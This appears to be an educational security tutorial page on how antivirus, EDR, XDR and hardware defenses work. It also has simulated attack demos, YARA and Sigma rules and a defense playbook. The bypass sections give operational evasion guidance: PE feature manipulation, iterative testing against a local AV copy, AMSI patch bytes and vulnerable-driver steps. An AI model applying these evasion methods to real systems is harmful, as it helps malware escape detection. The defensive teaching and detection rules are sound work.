This section documents publicly known bypass techniques from security research papers, conference talks (DEF CON, Black Hat), and vendor advisories. Understanding how modern defenses are circumvented is essential for building resilient security architectures. All techniques described here have published mitigations.
Traditional AV matched file hashes and byte patterns. Next-Gen AV (NGAV) from vendors like CrowdStrike, SentinelOne, Cylance, and Microsoft Defender for Endpoint uses a multi-layered approach:
① Static ML Model
Before execution. Trained on millions of PE features — import tables, section entropy, string patterns, header anomalies, compiler artifacts. Makes a malicious/benign prediction in <50ms. No signatures needed — classifies never-before-seen files.
Bypass: Adversarial ML — modify PE features (append benign strings, pad sections to lower entropy, add fake imports) to shift the model's decision boundary. Tools: MalGAN, EMBER adversarial.
② Behavioral Analysis
During execution. Monitors API call sequences, memory operations, file system changes, registry modifications, network connections. Builds a behavioral graph and compares against known attack patterns.
Bypass: API call unhooking (Ch 09), indirect syscalls, delayed execution, interleaving malicious calls with benign API noise to dilute the behavioral signal.
③ Cloud Lookup
File hash + metadata sent to vendor cloud in real-time. Cloud has access to global threat intelligence, shared IOCs, and heavier ML models too expensive to run locally. Can reclassify files retroactively after new intelligence arrives.
Bypass: Block outbound connections to AV cloud endpoints (e.g., *.wdcp.microsoft.com), use antiscan services instead of VirusTotal (which shares with vendors), ensure no prior submission of sample.
④ Cloud Sandbox Detonation
Suspicious files uploaded and executed in the vendor's cloud sandbox (Azure for Defender, CrowdStrike's Falcon Sandbox). Runs for 30-120 seconds, captures all behaviors, produces a verdict. More thorough than local analysis.
Bypass: Anti-sandbox evasion (Ch 09 Layer 5), execution delays >120s, environment-keying (only execute if %USERDOMAIN% matches target), human interaction gates (require mouse clicks to proceed).
⑤ Memory Scanning / AMSI
Scans content at runtime — PowerShell scripts, .NET assemblies, VBScript, JScript, even unpacked payloads in memory. AMSI hooks into script engines and provides the AV engine with the decoded content, defeating obfuscation.
Bypass: AMSI patching (Ch 09 Layer 4), hardware breakpoint hooking of AmsiScanBuffer, CLR profiler-based bypass, or avoiding managed runtimes entirely (use native C/C++ payloads).
ML models are the backbone of modern NGAV, but they have fundamental weaknesses that attackers exploit systematically:
ML models classify files based on extracted features. If you know (or can guess) which features the model uses, you can manipulate them without changing the payload's functionality.
// Problem: ML flags high entropy in .text section Fix: Insert dead code (junk functions that are never called) Entropy drops from 7.8 → 6.2 (below suspicion threshold) // Problem: ML flags small import table Fix: Add fake imports that are never used: LoadLibraryA("gdiplus.dll") // GUI library - looks normal GetProcAddress("GdipDrawLine") // never called Import count: 6 → 42 (matches legitimate software) // Problem: ML flags embedded strings ("shellcode", "inject") Fix: Compile-time string encryption (XOR/AES) Strings only exist decrypted in memory at runtime Static ML never sees them // Problem: ML flags abnormal PE section names Fix: Use standard names: .text, .rdata, .data, .rsrc Never use custom names like .crypt, .pack, .vmp
Sophisticated attackers profile the target's specific AV/ML model before deployment:
Step 1: Identify Target AV Recon: job postings mention "CrowdStrike" Or: phishing lure returns Defender-specific error Step 2: Set Up Local Copy of Target AV Install same product + version in test VM Enable cloud features (use burner license) Step 3: Iterative Testing Submit payload → observe detection → modify → resubmit Automated via: DefenderCheck, ThreatCheck These tools binary-search the file to find the EXACT byte range triggering detection Step 4: Feature Perturbation Modify only the flagged features Re-test until 0 detections locally Test against antiscan.me (doesn't share with vendors) Step 5: Deploy FUD window: typically 24-72 hours Before vendor cloud updates models with new sample
EDR watches endpoints. XDR (Extended Detection & Response) correlates signals across endpoints, network, email, cloud, and identity — making evasion exponentially harder because attackers must be invisible across every data source simultaneously.
ENDPOINT signal: svchost.exe (PID 7284) → RWX allocation + beacon behavior Alone: Low confidence (svchost does allocate memory legitimately) NETWORK signal: svchost.exe → HTTPS to cdn-update.azureedge[.]net every 60s Alone: Low confidence (legitimate Azure CDN traffic exists) EMAIL signal: User received .docm attachment 4 minutes before svchost anomaly Alone: Low confidence (user receives documents daily) IDENTITY signal: Same user attempted 3 failed logins to DC01 after svchost spawn Alone: Low confidence (password typos happen) ☆ XDR CORRELATION: Email(malicious attachment) → Endpoint(process injection) → Network(C2 beacon) → Identity(lateral movement attempt) COMBINED CONFIDENCE: 99.7% — automatic containment triggered Actions: Isolate host, disable user account, block C2 domain
Living-off-the-Land (LOL): Use only built-in OS tools (certutil, mshta, PowerShell) so endpoint signals blend with normal admin activity.
C2 over legitimate services: Abuse Slack, Discord, OneDrive, Google Sheets as C2 channels — network traffic goes to trusted domains.
Credential harvesting before lateral movement: Dump credentials from memory (Mimikatz-style) and use legitimate RDP/WinRM with real creds — identity layer sees "valid" authentication.
Slow & low: Operate over days/weeks at very low volume. XDR correlation windows are typically 24-48 hours — if attack stages span weeks, they may not correlate.
Retroactive correlation: When a new IOC is discovered, XDR searches historical telemetry (30-90 days) — activities that seemed benign at the time are re-evaluated.
UEBA (User Behavior Analytics): ML baselines each user's normal patterns. Even with valid credentials, unusual access times, abnormal file access patterns, or first-time connections trigger anomaly alerts.
Automated response: XDR can isolate a host in <30 seconds — faster than any human attacker can pivot. Even if the attacker evades detection on 3 layers, correlation with the 4th triggers containment.
Modern CPUs and operating systems now enforce security at the hardware level — protections that cannot be bypassed from userland regardless of how sophisticated the malware is.
Windows runs a tiny hypervisor (VBS — Virtualization-Based Security) beneath the OS. The kernel itself runs in a virtual machine. HVCI ensures every driver and kernel module is signed — even a kernel exploit cannot load unsigned code because the hypervisor enforces the policy from a higher privilege level.
Impact: Rootkits and unsigned kernel drivers are blocked even with admin/SYSTEM access. Attackers need a hypervisor escape (extremely rare).
Bypass attempts: Disable VBS via boot config (requires physical access + admin), exploit vulnerable signed drivers (BYOVD — Bring Your Own Vulnerable Driver), hypervisor escape (0-day class).
Intel CET adds a hardware shadow stack that mirrors the software call stack. On every RET instruction, the CPU checks if the return address matches the shadow stack. If they differ (buffer overflow modified the return address), the CPU raises a #CP exception — the exploit fails at the hardware level.
Impact: Classic stack buffer overflow → ROP chain exploits are dead on CET-enabled systems. EIP/RIP hijacking via stack smash no longer works.
Bypass attempts: JIT spray (corrupt JIT-compiled code regions), data-only attacks (corrupt data structures, not code flow), exploit non-CET processes (legacy 32-bit apps).
Secure Boot verifies every component in the boot chain — firmware → bootloader → kernel → drivers — using cryptographic signatures. TPM (Trusted Platform Module) stores measurements of each boot component. If any component is modified (bootkit), the chain breaks and the system won't boot or reports tampered state to remote attestation servers.
Impact: Bootkits (MBR/VBR/UEFI rootkits) that persist below the OS are blocked. BlackLotus (2023) was the first known UEFI bootkit to bypass Secure Boot in the wild.
Bypass: CVE-2022-21894 (BlackLotus exploited a Secure Boot vulnerability). Microsoft revoked the vulnerable bootloader but rollout is slow — many systems remain vulnerable as of 2024.
When HVCI blocks unsigned drivers, attackers bring a legitimately signed but vulnerable driver (e.g., old GPU drivers, anticheat modules, hardware utilities) and exploit its vulnerability to gain kernel code execution. The driver passes signature checks because it is genuinely signed — it's just buggy.
1. Drop signed vulnerable driver: RTCore64.sys (MSI Afterburner) 2. Load via sc.exe create — passes HVCI signature check ✓ 3. Exploit CVE-2019-16098 (arbitrary memory R/W in driver) 4. Use kernel R/W to disable EDR kernel callbacks 5. Remove PsSetCreateProcessNotifyRoutine entries 6. EDR is now fully blinded — kernel telemetry gone Known abused drivers: RTCore64.sys, dbutil_2_3.sys (Dell), gdrv.sys (Gigabyte), ene.sys (ENE Technology), cpuz141.sys Microsoft maintains a blocklist but it's perpetually incomplete.
Traditional networks have a perimeter (firewall) — once inside, assets trust each other. Zero Trust assumes every request is potentially malicious, regardless of source. This fundamentally changes the attacker's playbook:
| Zero Trust Principle | What It Blocks | Attacker Workaround |
|---|---|---|
| Verify explicitly — authenticate every request with MFA + device health + location + risk score | Stolen credentials alone are insufficient. Even with valid AD creds, MFA + device compliance check blocks lateral movement. | MFA fatigue attacks (push spam), SIM swapping, adversary-in-the-middle (AiTM) phishing proxies like Evilginx2 that capture session tokens post-MFA. |
| Least-privilege access — users/services get minimum required permissions, just-in-time access only | Compromised accounts can reach only what they're explicitly authorized. No "Domain Admin" always-on access. | Target JIT approval workflows. Social engineer the approver. Abuse legitimate access to escalate via misconfigurations (Azure AD role abuse, delegation attacks). |
| Assume breach — microsegmentation, encrypt all internal traffic, continuous monitoring | Lateral movement hits microsegment boundaries. Internal traffic is TLS-encrypted, preventing sniffing. Every hop is logged. | Abuse allowed application pathways (e.g., if the web server is allowed to talk to the DB, compromise the web server and use its legitimate connection). "Living inside the allowed traffic." |
In a Zero Trust world, the most valuable artifact isn't credentials — it's session tokens. Once a user completes MFA and gets a session cookie (e.g., an Azure AD Primary Refresh Token), anyone who steals that token inherits the authenticated session — bypassing MFA completely. This is why attacks like AiTM phishing (Evilginx2, Modlishka), token theft (dumping browser cookies, PRT extraction), and pass-the-cookie attacks are the dominant initial access technique in 2024–2026.
The attack surface has expanded far beyond Windows endpoints. Modern attackers target the entire infrastructure stack:
SSRF → IMDS: Server-Side Request Forgery hitting the cloud metadata service (169.254.169.254) to steal instance credentials. Single HTTP request → full cloud account compromise.
IAM privilege escalation: Misconfigured AWS IAM roles/policies allowing iam:PassRole + lambda:CreateFunction → create Lambda with admin role → full account takeover.
Container escape: Kubernetes pods with privileged: true or mounted Docker socket → escape to host → pivot across cluster.
Supply chain: Compromise CI/CD pipelines (GitHub Actions, Jenkins), inject backdoors into build artifacts that deploy to thousands of targets (SolarWinds model).
macOS Gatekeeper: Blocks unsigned/unnotarized apps. Bypass: Abuse archive formats that strip quarantine attributes (CVE-2022-42821 — Archive Utility bypass).
macOS SIP (System Integrity Protection): Kernel-level protection of system files. Bypass: Exploit entitled Apple daemons that have SIP exceptions (e.g., the system_installd Shrootless bug, CVE-2021-30892).
Linux eBPF monitoring: Modern EDRs use eBPF for deep kernel visibility. Bypass: Manipulate eBPF maps, exploit eBPF verifier bugs (CVE-2021-4204), or use kernel-level rootkits to hide from eBPF probes.
Linux SELinux/AppArmor: Mandatory access controls. Bypass: Exploit processes running in unconfined domains, abuse allowed transitions, or find kernel vulns that bypass MAC entirely.
Despite every bypass technique above, the defender's position has never been stronger. Here's why:
Attack cost has skyrocketed: In 2015, a reliable exploit chain cost ~$50K. In 2026, a full iOS chain is worth $2M+ (Zerodium pricing). Hardware security, HVCI, CET, and hardened browsers have made exploitation dramatically more expensive.
Detection breadth is overwhelming: XDR correlates 5+ data sources. An attacker who evades endpoint ML still gets caught by network anomaly detection, email analysis, identity analytics, or cloud audit logs.
Automation favors defenders: SOAR platforms can isolate hosts, revoke tokens, and block IPs in under 30 seconds. The attacker's window between initial access and containment is shrinking every year.
Hardware can't be patched by malware: HVCI, CET, Secure Boot, and TPM create trust anchors that software-only attacks simply cannot reach. This is a fundamental architectural advantage.
These interactive demos simulate what happens during real attacks — using only safe, simulated data in your browser. No actual exploits, shellcode, or malicious network connections are involved. Each demo recreates the visible and invisible output an analyst would see when examining a real attack, so you can understand both what the user sees (nothing unusual) and what's actually happening behind the scenes.
What this simulates: Every Office/PDF document contains metadata — author names, software versions, creation timestamps, printer names, file paths, and revision histories. Attackers use this for reconnaissance: before sending a phishing email, they'll harvest documents from the target organization's website (investor reports, published PDFs, public filings) and extract metadata to learn employee names, internal software versions, directory structures, and network paths. This demo shows you the exact metadata fields that tools like exiftool, FOCA, and metagoofil extract from a typical Office document.
What to look for: The Author field reveals real employee names. The Software field reveals Office version (which tells the attacker which CVEs might work). The Template field can reveal internal server paths. The LastSavedBy field shows who edited the document last — potentially a different employee than the author.
What this simulates: A zero-click exploit targeting a messaging app. In real attacks (like FORCEDENTRY or the WhatsApp VOIP bug), the victim receives a message or call that triggers automatic parsing of malicious data — no taps, clicks, or interaction required. This demo recreates the kill chain: (1) incoming message notification appears, (2) the messaging app's parser processes the attachment automatically, (3) the parser triggers a buffer overflow in the image/media decoder, (4) the overflow redirects execution to shellcode, (5) the shellcode installs a persistent implant. Everything happens in under 2 seconds — the victim's only visible indicator is a brief notification that may disappear.
What to look for: Watch the timing — the exploit completes before a human could possibly react. Notice how the "legitimate" app functionality (receiving a message) is the attack vector. In real forensics, the only artifact might be a log entry showing the message was received and deleted, or an anomalous crash report from the parser component.
What this simulates: What happens inside the Office process when a user clicks "Enable Content" on a macro-laden document. In the real attack: (1) Office loads the VBA project from the document's vbaProject.bin OLE stream, (2) it compiles the VBA code to p-code, (3) it executes Auto_Open() or Document_Open() automatically, (4) the macro uses Shell() or WScript.Shell to launch PowerShell, (5) PowerShell downloads and executes a second-stage payload from the attacker's C2 server. This demo shows each stage with the actual process tree and command lines that a forensic analyst would see in Sysmon logs.
What to look for: The process chain: WINWORD.EXE → cmd.exe → powershell.exe → beacon.exe. In real attacks, the PowerShell command is often base64-encoded (-enc flag) and uses Invoke-Expression (IEX) with Net.WebClient.DownloadString() to pull the next stage entirely in memory — never touching disk.
What this simulates: The complete lifecycle of a malicious PDF being opened in Adobe Reader. This is the same attack detailed in Section 05 (Exploit Crafting Pipeline), but shown from the runtime perspective — what actually happens second by second inside the Reader process. The demo traces: (1) PDF header parsing and object loading, (2) Catalog traversal finding the /OpenAction reference, (3) JavaScript Action object loading and stream decompression, (4) SpiderMonkey JS engine executing the heap spray loop (allocating ~200MB of NOP sled + shellcode), (5) the vulnerable API call (Collab.collectEmailInfo) triggering the buffer overflow, (6) EIP hijack to 0x0C0C0C0C, (7) CPU sliding through the NOP sled, (8) shellcode execution — PEB walk → API resolution → download → backdoor execution.
What to look for: The heap spray creates a distinctive memory pattern — hundreds of identical 1MB blocks at predictable addresses. EDR tools detect this by monitoring VirtualAlloc call frequency. The vulnerability trigger (Collab.collectEmailInfo) is a known dangerous function that PDF security scanners flag. The child process spawn (AcroRd32.exe → cmd.exe) is the most reliable detection point.
The following demos simulate the evasion techniques covered in Chapter 08 — FUD. Each one recreates exactly what an analyst would see in process monitors, debuggers, and EDR telemetry when these techniques are used in real malware.
What this simulates: A raw RAT payload (AsyncRAT.exe) being processed through a crypter. The demo shows the exact sequence: (1) the original executable is scanned and flagged by 47/72 AV engines, (2) the crypter reads the PE file, encrypts each section with AES-256, (3) a new stub executable is generated that contains the encrypted payload as a resource, (4) at runtime the stub decrypts the payload in memory and passes control to the original entry point — never writing the decrypted payload to disk. The final stub is scanned again: 0/72 detections. This is exactly how services like Veil, Hyperion, and commercial crypters work.
What to look for: Notice the entropy change — the original PE has distinct .text, .data, .rdata sections with varying entropy. After crypting, the payload blob shows near-uniform 7.98 entropy (near-random). EDR tools flag this — legitimate software rarely has sections above 7.0 entropy. Also watch the stub's import table: it only imports VirtualAlloc, RtlMoveMemory, and a few crypto APIs — a suspiciously minimal import table compared to normal software.
What this simulates: The complete RunPE process hollowing technique. A malicious loader spawns a legitimate Windows process (svchost.exe) in a SUSPENDED state, hollows out its memory, writes a malicious payload into the hollowed process, fixes up the thread context to point to the new entry point, and resumes execution. The result: the malicious code runs under the identity of a trusted Windows process. This is the #1 technique used by crypter stubs to execute decrypted payloads in memory.
What to look for: Watch the API call sequence — this is the exact pattern EDR tools signature: CreateProcess(SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread. Any process that calls this exact chain is almost certainly performing process hollowing. Also notice the parent-child mismatch: svchost.exe is normally spawned by services.exe, not by a random executable — EDR flags this anomaly.
What this simulates: An attacker bypassing the Anti-Malware Scan Interface (AMSI) in PowerShell before executing a malicious script. AMSI is Microsoft's scanning hook — every PowerShell command, VBScript, and JScript is sent to the installed AV engine before execution. Attackers bypass it by patching the AmsiScanBuffer function in memory to always return "clean." This demo shows: (1) a malicious PowerShell command being blocked by AMSI, (2) the memory patch being applied (overwriting the first bytes of AmsiScanBuffer with a RET instruction), (3) the same command now executing successfully because AMSI no longer scans it.
What to look for: The bypass is a single memory write — changing 3 bytes (0xB8 0x57 0x00 0x07 0x80 0xC3 = mov eax, 0x80070057; ret) at the start of amsi.dll!AmsiScanBuffer. This makes every subsequent scan return AMSI_RESULT_CLEAN. Defenders detect this by monitoring VirtualProtect calls targeting amsi.dll memory regions, or by using ETW events that fire before AMSI even processes the scan.
What this simulates: How malware evades EDR (Endpoint Detection & Response) by bypassing userland hooks. Modern EDR products (CrowdStrike, SentinelOne, Defender for Endpoint) inject a DLL into every process that hooks critical ntdll.dll functions — when malware calls NtAllocateVirtualMemory or NtWriteVirtualMemory, the hook redirects execution to the EDR's monitoring code first. This demo shows two bypass methods: (1) Fresh DLL mapping — reading a clean copy of ntdll.dll from disk and overwriting the hooked copy in memory, and (2) Direct syscalls — calling the kernel directly via the syscall instruction, completely skipping ntdll.dll and all its hooks.
What to look for: In Method 1, watch the EDR hooks disappear — the function prologue changes from jmp EDR_Hook back to the original mov r10, rcx; mov eax, SSN. In Method 2, notice the syscall is made directly from the malware's own code — there's no call into ntdll.dll at all. Defenders counter this with kernel callbacks (which can't be unhooked from userland) and by monitoring for processes that read ntdll.dll from disk with CreateFile — legitimate software never does this.
What this simulates: A malware sample performing environment checks before executing its payload. Sophisticated malware won't detonate in analysis environments — it checks for signs of sandboxes (low CPU cores, small RAM, short uptime), virtual machines (VMware/VirtualBox artifacts, hypervisor CPUID bit), and debuggers (timing checks, PEB flags, hardware breakpoints). If any check fails, the malware exits cleanly or runs benign code instead — appearing "clean" to automated analysis systems. This demo runs through real checks that malware like Emotet, TrickBot, and Cobalt Strike beacons perform.
What to look for: Notice the layered approach — the malware doesn't rely on a single check. It performs 12+ checks across CPU, memory, processes, registry, timing, and user behavior. Each check alone might have false positives, but the combination creates a reliable sandbox fingerprint. Pay attention to the mouse movement check — many sandboxes have static cursors. The "delayed execution" trick (sleeping 5+ minutes) is designed to outlast sandbox analysis timeouts, which typically run samples for 60-120 seconds.
setTimeout() calls and DOM manipulation. No network requests are made. No files are created. No system APIs are called. The "hex bytes" and "memory addresses" shown are pre-written strings — not actual memory contents. You can verify this by viewing the page source.
Understanding exploits is only valuable if it improves your defense. Every exploit shown in this page has specific, actionable countermeasures. Below is a comprehensive defense playbook organized by attack type — each item explains what to do, why it works, and what it specifically prevents.
reg delete HKCR\ms-msdt /f as administrator. MSDT is rarely used and provides a direct code execution path through URL protocol handlers. Why it works: Without the protocol handler registered, the ms-msdt: URL scheme is ignored by the OS — the bridge between Office and PowerShell execution doesn't exist. Specifically prevents: Follina (CVE-2022-30190) and any future attacks abusing the MSDT protocol.WINWORD.EXE → cmd.exe chains), "Block Office from creating executable content" (prevents malware drops), "Block Office from injecting code into other processes" (prevents process hollowing), "Block Win32 API calls from Office macros" (prevents Shell() calls). Why it works: Even if a macro or exploit executes, ASR rules block the specific OS operations the attacker needs for the next stage. Specifically prevents: All macro-based downloaders, all child process spawning, all process injection from Office contexts.No single control stops everything — and that's by design. The goal is to create overlapping layers where each control catches what the others miss:
Layer 1 — Prevention: Patching + ASR rules + Lockdown Mode → stops known exploits before they execute.
Layer 2 — Detection: EDR + email sandbox + network monitoring → catches exploit behavior even if the vulnerability is unknown (zero-day).
Layer 3 — Response: Incident response plan + forensic capability + device reboot procedures → limits damage when an attack succeeds.
Layer 4 — Recovery: Backups + re-imaging capability + credential rotation → restores operations after a breach.
If any one layer catches the attack, the kill chain is broken. An attacker must bypass every layer to succeed. This asymmetry favors the defender — the attacker must be perfect, you only need to catch them once.
Modern operating systems deploy multiple hardware and software mitigations that make exploitation dramatically harder. Understanding how each one works — and how attackers bypass them — is essential for both offense and defense.
What it does: Randomizes the base address of the executable, DLLs, stack, and heap on every process start. A DLL that loaded at 0x7FFE0000 last time might load at 0x7FF30000 next time.
What it prevents: Hardcoded addresses in exploits. The heap spray target 0x0c0c0c0c and ROP gadget addresses become unpredictable.
Bypass: Information leaks — if the attacker can read a pointer from memory (e.g., via a format string bug or type confusion), they learn the DLL base and calculate all gadget offsets from it.
What it does: Marks memory pages as either writable OR executable, never both. The stack and heap are writable but NOT executable. Code sections are executable but NOT writable.
What it prevents: Classic shellcode injection. Even if you overflow a buffer and place shellcode on the stack, the CPU refuses to execute it (hardware NX bit on every page table entry).
Bypass: ROP (Return-Oriented Programming) — chain together existing code "gadgets" (small instruction sequences ending in ret) from executable DLLs. Or call VirtualProtect() via ROP to mark the shellcode page as executable.
What it does: The compiler inserts a random value (the "canary") between local variables and the saved return address on the stack. Before the function returns, it checks if the canary is still intact.
What it prevents: Sequential buffer overflows that overwrite the saved EIP/RIP. The overflow corrupts the canary before reaching the return address → detected → process terminates safely.
Bypass: Information leak to read the canary value, then include it in the overflow payload. Or use a write-what-where primitive that skips over the canary (e.g., indexed array out-of-bounds).
What it does: CFG (Windows) validates indirect call targets against a bitmap of valid function entry points at runtime. CET (Intel hardware) maintains a shadow stack that the attacker can't overwrite — the hardware compares the shadow stack return address with the actual return address.
What it prevents: CFG blocks calling arbitrary addresses via hijacked function pointers. CET blocks ROP chains because the shadow stack detects modified return addresses.
Bypass: CFG: call a valid function that itself is dangerous (e.g., ntdll!NtContinue to pivot execution context). CET: Still new (Windows 11+ / 12th Gen+), limited bypass research published so far.
YARA is the industry standard for pattern-matching malicious files. These rules scan PDFs, Office documents, and memory dumps for known exploit patterns. Every SOC should deploy YARA on email gateways, file shares, and EDR agents.
rule PDF_Suspicious_JavaScript {
meta:
description = "Detects PDF files with embedded JavaScript (potential exploit)"
author = "SOC Analyst Playbook"
severity = "medium"
strings:
$pdf_magic = "%PDF-"
$js_action = "/OpenAction" nocase
$js_tag = "/JavaScript" nocase
$js_tag2 = "/JS" nocase
$aa = "/AA" nocase // Additional Actions
$launch = "/Launch" nocase // Launch action (runs executables)
condition:
$pdf_magic at 0 and ($js_action or $aa) and ($js_tag or $js_tag2 or $launch)
}
rule PDF_HeapSpray_Shellcode {
meta:
description = "Detects heap spray NOP sled patterns in PDF JavaScript"
author = "SOC Analyst Playbook"
severity = "critical"
strings:
$pdf_magic = "%PDF-"
$nop_uni = "%u0c0c%u0c0c" // Classic NOP sled in unicode escape
$nop_uni2 = "%u9090%u9090" // x86 NOP NOP as unicode
$nop_hex = "\\x0c\\x0c\\x0c\\x0c" // Hex-escaped NOP sled
$substr = "substr(" nocase // String slicing (shellcode construction)
$unescape = "unescape(" nocase // Unicode decode (shellcode delivery)
$collab = "Collab" nocase // Collab.collectEmailInfo exploit trigger
$spell = "spell.customDictionaryOpen" nocase // Spell check exploit
condition:
$pdf_magic at 0 and (any of ($nop_*)) and (any of ($substr, $unescape, $collab, $spell))
}
rule Office_Remote_Template_Injection {
meta:
description = "Detects Office docs loading remote templates (CVE-2021-40444 pattern)"
severity = "high"
strings:
$rels_xml = "word/_rels/" nocase
$target_ext = /Target\s*=\s*"https?:\/\/[^"]{10,}"/ nocase
$target_mode = "TargetMode=\"External\"" nocase
condition:
all of them
}
Sigma rules are the YARA equivalent for log data — they define detection logic that translates to SIEM queries (Splunk SPL, Elastic KQL, Microsoft Sentinel KQL). Deploy these to catch exploit post-exploitation behavior in your environment.
title: Office Application Spawning Suspicious Child Process
id: 5c5e13a2-df44-414c-b7f0-a1cc4f2e8b7d
status: production
level: high
description: |
Detects Microsoft Office applications spawning cmd.exe, powershell.exe,
mshta.exe, or other living-off-the-land binaries. This is a strong indicator
of document-based exploitation (macros, DDE, OLE, Follina).
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\WINWORD.EXE'
- '\EXCEL.EXE'
- '\POWERPNT.EXE'
- '\OUTLOOK.EXE'
- '\MSACCESS.EXE'
selection_child:
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\mshta.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\certutil.exe'
- '\bitsadmin.exe'
- '\msdt.exe' # Follina (CVE-2022-30190)
- '\rundll32.exe'
condition: selection_parent and selection_child
falsepositives:
- Legitimate Office add-ins that spawn helper processes
- IT automation scripts triggered by Office macros
tags:
- attack.execution
- attack.t1204.002 # User Execution: Malicious File
- attack.t1059.001 # PowerShell
- attack.t1218.005 # Mshta
title: LSASS Memory Access by Non-System Process
id: 0d894093-71bc-43c3-8985-a84f8fa4a09f
status: production
level: critical
description: |
Detects processes accessing LSASS memory — a key indicator of credential
dumping (Mimikatz, procdump, nanodump). This is Step 5 in our attack chain:
privilege escalation + credential theft.
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess|contains:
- '0x1010' # PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ
- '0x1410' # + PROCESS_VM_WRITE
- '0x1438' # Full access (Mimikatz default)
- '0x1F0FFF' # PROCESS_ALL_ACCESS
filter_system:
SourceImage|endswith:
- '\lsass.exe'
- '\csrss.exe'
- '\svchost.exe'
- '\MsMpEng.exe' # Defender
condition: selection and not filter_system
falsepositives:
- AV/EDR products accessing LSASS for protection
- Crash dump utilities (WerFault.exe)
tags:
- attack.credential_access
- attack.t1003.001 # OS Credential Dumping: LSASS Memory
Test your understanding of the exploit concepts covered in this tutorial. Each question maps to a specific section — review the section if you get it wrong.
Q1. In a heap spray attack targeting 32-bit Adobe Reader, why is 0x0c0c0c0c commonly used as the target address? (Section 02 — Hacker Math)
Q2. What makes FORCEDENTRY (CVE-2021-30860) a "zero-click" exploit? (Section 03 — Zero-Click)
Q3. What is the purpose of a stack canary? (Section 10 — Defense)
Q4. In the MITRE ATT&CK framework, what technique ID corresponds to "Spearphishing Attachment"? (Section 06 — Attack Chain)
Q5. How does ROP (Return-Oriented Programming) bypass DEP? (Section 07 — Exploit Craft)
Q6. What does the Sigma rule for "Office Spawning Suspicious Processes" specifically detect? (Section 10 — Defense)
Q7. Why do MotW bypass attacks use ISO/IMG container files? (Section 04 — Doc Exploits)
Q8. What is the key difference between little-endian and big-endian byte order in exploit development? (Section 02 — Hacker Math)
Every tool a threat hunter needs in one place. Convert data between formats, encode and decode payloads, hash strings, analyze hex dumps — all client-side, nothing leaves your browser. Use the copy button on any output to grab results for your analysis workflow.
Convert text to hexadecimal bytes and back. Essential for reading shellcode, analyzing packet captures, and decoding obfuscated strings found in malware.
Base64 is everywhere: email attachments, JWT tokens, PowerShell encoded commands (-EncodedCommand), data URIs, and obfuscated malware payloads. Attackers love it because it turns binary into text that survives transport.
URL encoding converts special characters to %XX hex pairs. Used in web exploits (XSS, SQLi, SSRF), phishing URL obfuscation, and C2 communication over HTTP. Essential for analyzing web application attacks.
Convert between text and JavaScript unicode escapes (%uXXXX), hex escapes (\xXX), and HTML entities (&#xXX;). These formats are used in heap spray shellcode, XSS payloads, and obfuscated JavaScript.
Generate cryptographic hashes for threat intel IOC lookups, file integrity checks, and malware sample identification. Paste a string and see all common hash formats instantly. Compare against VirusTotal, MISP, or your SIEM.
Simple substitution cipher used in CTF challenges, obfuscated scripts, and quick payload hiding. Adjust the rotation value (ROT-13 is the default, ROT-47 covers ASCII printable). Some malware uses cascading ROT to avoid static signatures.
XOR is the most common obfuscation in malware. Shellcode XOR'd with a single-byte key evades static signature detection. Enter data and a key — the tool shows XOR'd output in hex. XOR is its own inverse: apply the same key again to decode.
Convert between binary (base-2), decimal, hex, and ASCII text. Useful for analyzing bit flags, permission masks, network protocol fields, and understanding low-level CPU operations.
Paste any text and see a full hex dump with offsets, hex bytes, and ASCII representation — the same format you see in hex editors (HxD, xxd, hexdump). Essential for binary analysis, memory forensics, and packet inspection.
Decode JSON Web Tokens without sending them to any external service. See the header, payload, and signature. Useful for API security testing, OAuth debugging, and verifying token claims during pentests.
Social engineering is the #1 initial access vector. Attackers don't just send malware — they send convincing documents. An invoice PDF from a "vendor" is far more likely to be clicked than a random attachment. In this lab, you'll generate a real professional invoice PDF and study what separates it from a weaponized one.
Fill in the invoice details below. The generated PDF will contain a visible download link — just like a real phishing document would. The link points to whatever URL you specify (e.g., the official PuTTY download). Everything runs client-side.
pdfid or pdf-parser — what objects do you see?
Your generated invoice is completely benign. Here's exactly what separates it from a real weaponized phishing PDF — and why understanding the difference matters for threat hunting.
/URI annotation — a normal clickable hyperlink. The user sees it, clicks it voluntarily, browser navigates.
/JavaScript or /JS entries in the PDF object tree.
/OpenAction or /AA (Additional Actions). Nothing executes when the PDF is opened.
/EmbeddedFile), no file attachments, no embedded executables.
/Launch action to execute a command when clicked — can run cmd.exe, PowerShell, or an embedded EXE directly.
When you run pdfid on your generated invoice, here's what it reports vs. what a malicious PDF would show:
/Page 1 /URI 1 /Action 1 /JavaScript 0 ← clean /JS 0 ← clean /OpenAction 0 ← clean /Launch 0 ← clean /EmbeddedFile 0 ← clean /AcroForm 0 ← clean /XFA 0 ← clean /Encrypt 0 /ObjStm 0
/Page 1 /URI 0 /Action 3 ← suspicious /JavaScript 2 ← 🚩 ALERT /JS 2 ← 🚩 ALERT /OpenAction 1 ← 🚩 auto-exec /Launch 1 ← 🚩 cmd exec /EmbeddedFile 1 ← 🚩 payload /AcroForm 1 ← 🚩 forms /XFA 0 /Encrypt 1 ← hides content /ObjStm 3 ← compressed objs
Use this checklist when analyzing suspicious PDFs during incident response or threat hunting. Each flag is mapped to the MITRE ATT&CK framework.
"OVERDUE", "FINAL NOTICE", "Act within 24 hours" — social pressure to bypass critical thinking.
T1566.001 — Spearphishing AttachmentInvoice from "CloudSync Technologies" but email is from billing@cl0udsync-tech.com — typosquatting domain.
"Download the secure client" — legitimate invoices never ask you to install software. This is the #1 social engineering trigger.
T1204.002 — User Execution: Malicious FilePDFs containing JavaScript are almost always malicious in a corporate context. Legitimate invoices have zero need for JS.
T1059.007 — Command and Scripting: JavaScriptAuto-execute on open = zero-click. The PDF does something the instant it's rendered, before the user interacts.
T1203 — Exploitation for Client ExecutionCan directly invoke system commands. A PDF calling cmd.exe or powershell.exe is a definitive IOC.
/EmbeddedFile streams containing executables, scripts, or Office documents with macros — payload delivery inside the PDF.
Multiple filter chains (FlateDecode + ASCIIHexDecode + ASCII85Decode) stacked to hide content from static scanners.
